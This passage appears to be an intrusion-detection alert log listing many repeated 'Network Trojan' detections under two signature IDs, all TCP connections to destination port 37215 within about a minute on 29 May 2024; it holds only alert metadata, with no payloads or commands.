                SID:2829579
                Source Port:57550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414677
                SID:2829579
                Source Port:58294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.029609
                SID:2835222
                Source Port:41286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523928
                SID:2835222
                Source Port:47606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161350
                SID:2829579
                Source Port:42882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782941
                SID:2835222
                Source Port:36480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811747
                SID:2835222
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820704
                SID:2835222
                Source Port:50216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701343
                SID:2835222
                Source Port:34296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432598
                SID:2835222
                Source Port:37038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794985
                SID:2829579
                Source Port:32914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744941
                SID:2835222
                Source Port:51894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216667
                SID:2829579
                Source Port:41562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717152
                SID:2835222
                Source Port:59200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644871
                SID:2829579
                Source Port:52398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561053
                SID:2829579
                Source Port:44800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332587
                SID:2829579
                Source Port:58794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831219
                SID:2829579
                Source Port:45978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009910
                SID:2835222
                Source Port:42316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654369
                SID:2829579
                Source Port:33950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073984
                SID:2835222
                Source Port:36996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994392
                SID:2829579
                Source Port:42344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330310
                SID:2835222
                Source Port:59272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369281
                SID:2829579
                Source Port:36908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228777
                SID:2829579
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738529
                SID:2829579
                Source Port:47686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136943
                SID:2829579
                Source Port:54878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155165
                SID:2835222
                Source Port:44442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558251
                SID:2829579
                Source Port:55122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277169
                SID:2835222
                Source Port:44662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740449
                SID:2835222
                Source Port:40232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226905
                SID:2829579
                Source Port:59676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.613852
                SID:2835222
                Source Port:54150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855833
                SID:2829579
                Source Port:35758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.732819
                SID:2835222
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689056
                SID:2829579
                Source Port:43002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223301
                SID:2829579
                Source Port:51668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002189
                SID:2829579
                Source Port:52668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512319
                SID:2829579
                Source Port:36510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032599
                SID:2829579
                Source Port:60070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180599
                SID:2829579
                Source Port:55372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262682
                SID:2829579
                Source Port:58368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557097
                SID:2829579
                Source Port:43538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596778
                SID:2835222
                Source Port:58292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684738
                SID:2829579
                Source Port:40268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575432
                SID:2829579
                Source Port:55882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.654826
                SID:2829579
                Source Port:36174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.607531
                SID:2829579
                Source Port:40410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900307
                SID:2835222
                Source Port:49468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731327
                SID:2835222
                Source Port:49036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518037
                SID:2829579
                Source Port:41964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780703
                SID:2835222
                Source Port:50310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461461
                SID:2829579
                Source Port:57530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764162
                SID:2829579
                Source Port:54968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543482
                SID:2829579
                Source Port:50446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781939
                SID:2829579
                Source Port:39868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281756
                SID:2829579
                Source Port:42642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558243
                SID:2835222
                Source Port:51938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520153
                SID:2835222
                Source Port:48514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272371
                SID:2829579
                Source Port:38174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013423
                SID:2835222
                Source Port:34426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981336
                SID:2835222
                Source Port:33874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088610
                SID:2829579
                Source Port:32982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909722
                SID:2829579
                Source Port:43884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321031
                SID:2835222
                Source Port:57018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765201
                SID:2829579
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830937
                SID:2829579
                Source Port:36482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321190
                SID:2835222
                Source Port:38008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166178
                SID:2829579
                Source Port:44286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165189
                SID:2829579
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504768
                SID:2835222
                Source Port:35596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651815
                SID:2829579
                Source Port:60216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858101
                SID:2829579
                Source Port:57034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984857
                SID:2829579
                Source Port:60050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.812169
                SID:2829579
                Source Port:36142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854503
                SID:2835222
                Source Port:57854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422206
                SID:2829579
                Source Port:51978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384468
                SID:2835222
                Source Port:59408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815133
                SID:2835222
                Source Port:35336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797838
                SID:2835222
                Source Port:33274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022047
                SID:2829579
                Source Port:58708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013607
                SID:2829579
                Source Port:52404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215625
                SID:2835222
                Source Port:56040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640752
                SID:2829579
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911190
                SID:2829579
                Source Port:37210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166797
                SID:2835222
                Source Port:46360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817177
                SID:2829579
                Source Port:60074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831314
                SID:2835222
                Source Port:42256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210045
                SID:2829579
                Source Port:44300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556919
                SID:2829579
                Source Port:46246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281014
                SID:2835222
                Source Port:36018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787966
                SID:2829579
                Source Port:57584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845826
                SID:2835222
                Source Port:50116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610157
                SID:2835222
                Source Port:56842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165235
                SID:2835222
                Source Port:37696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788405
                SID:2835222
                Source Port:32874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390706
                SID:2829579
                Source Port:46228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.439152
                SID:2835222
                Source Port:41758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160351
                SID:2835222
                Source Port:51234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008409
                SID:2829579
                Source Port:46424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816345
                SID:2835222
                Source Port:56598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418985
                SID:2835222
                Source Port:41898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515612
                SID:2829579
                Source Port:54716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453438
                SID:2835222
                Source Port:44540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329525
                SID:2829579
                Source Port:42968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931891
                SID:2835222
                Source Port:43922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.059882
                SID:2835222
                Source Port:48960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941439
                SID:2829579
                Source Port:49316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831110
                SID:2829579
                Source Port:37676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810519
                SID:2835222
                Source Port:51048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836219
                SID:2835222
                Source Port:44774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.734513
                SID:2829579
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134066
                SID:2829579
                Source Port:43722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597413
                SID:2829579
                Source Port:56422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181750
                SID:2835222
                Source Port:54214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552049
                SID:2829579
                Source Port:50428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967342
                SID:2829579
                Source Port:34724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919182
                SID:2835222
                Source Port:36074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561099
                SID:2829579
                Source Port:55644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870516
                SID:2829579
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583281
                SID:2829579
                Source Port:44574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166828
                SID:2829579
                Source Port:40458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786265
                SID:2835222
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362582
                SID:2835222
                Source Port:51890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896382
                SID:2829579
                Source Port:38952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074706
                SID:2829579
                Source Port:42074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561738
                SID:2829579
                Source Port:57982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361580
                SID:2829579
                Source Port:39740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422175
                SID:2835222
                Source Port:50352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211977
                SID:2829579
                Source Port:34976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442021
                SID:2829579
                Source Port:44620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867948
                SID:2829579
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882995
                SID:2835222
                Source Port:38876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727274
                SID:2835222
                Source Port:48894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171401
                SID:2835222
                Source Port:36516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689599
                SID:2835222
                Source Port:48136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324806
                SID:2829579
                Source Port:53888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801429
                SID:2829579
                Source Port:54762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869320
                SID:2835222
                Source Port:35790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.806289
                SID:2835222
                Source Port:57884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162780
                SID:2829579
                Source Port:48518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788251
                SID:2829579
                Source Port:53544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010798
                SID:2829579
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701285
                SID:2835222
                Source Port:39498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321219
                SID:2835222
                Source Port:35720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765262
                SID:2835222
                Source Port:45512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986860
                SID:2829579
                Source Port:37032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712637
                SID:2835222
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786655
                SID:2829579
                Source Port:51030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869636
                SID:2829579
                Source Port:48462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807272
                SID:2829579
                Source Port:49426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264599
                SID:2829579
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854326
                SID:2835222
                Source Port:55104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993799
                SID:2835222
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467449
                SID:2835222
                Source Port:57922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009769
                SID:2835222
                Source Port:45170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.442505
                SID:2829579
                Source Port:49260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738332
                SID:2829579
                Source Port:51472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318033
                SID:2829579
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655709
                SID:2835222
                Source Port:35828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994045
                SID:2835222
                Source Port:43530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419427
                SID:2829579
                Source Port:50712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815523
                SID:2835222
                Source Port:60366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598173
                SID:2835222
                Source Port:60688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852364
                SID:2829579
                Source Port:58534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279305
                SID:2829579
                Source Port:38168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437739
                SID:2829579
                Source Port:52804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780040
                SID:2835222
                Source Port:40994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223120
                SID:2829579
                Source Port:49048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858910
                SID:2835222
                Source Port:59802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823920
                SID:2829579
                Source Port:36652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786975
                SID:2835222
                Source Port:37424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559035
                SID:2829579
                Source Port:39720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039838
                SID:2829579
                Source Port:56754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223950
                SID:2829579
                Source Port:39672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360524
                SID:2835222
                Source Port:46718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815594
                SID:2829579
                Source Port:49758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507346
                SID:2835222
                Source Port:32772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136251
                SID:2829579
                Source Port:35234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088204
                SID:2835222
                Source Port:39888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062633
                SID:2829579
                Source Port:36034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361841
                SID:2829579
                Source Port:36364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008922
                SID:2829579
                Source Port:59564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178384
                SID:2835222
                Source Port:53018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649690
                SID:2835222
                Source Port:48278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060599
                SID:2829579
                Source Port:56930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626675
                SID:2829579
                Source Port:54668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706482
                SID:2835222
                Source Port:45972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285631
                SID:2835222
                Source Port:34754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557844
                SID:2835222
                Source Port:51452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374440
                SID:2835222
                Source Port:60052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899589
                SID:2829579
                Source Port:43822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660406
                SID:2835222
                Source Port:56570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002102
                SID:2829579
                Source Port:56686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032911
                SID:2835222
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178101
                SID:2835222
                Source Port:36022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414812
                SID:2835222
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.741678
                SID:2829579
                Source Port:44836
                Destination Port:37215
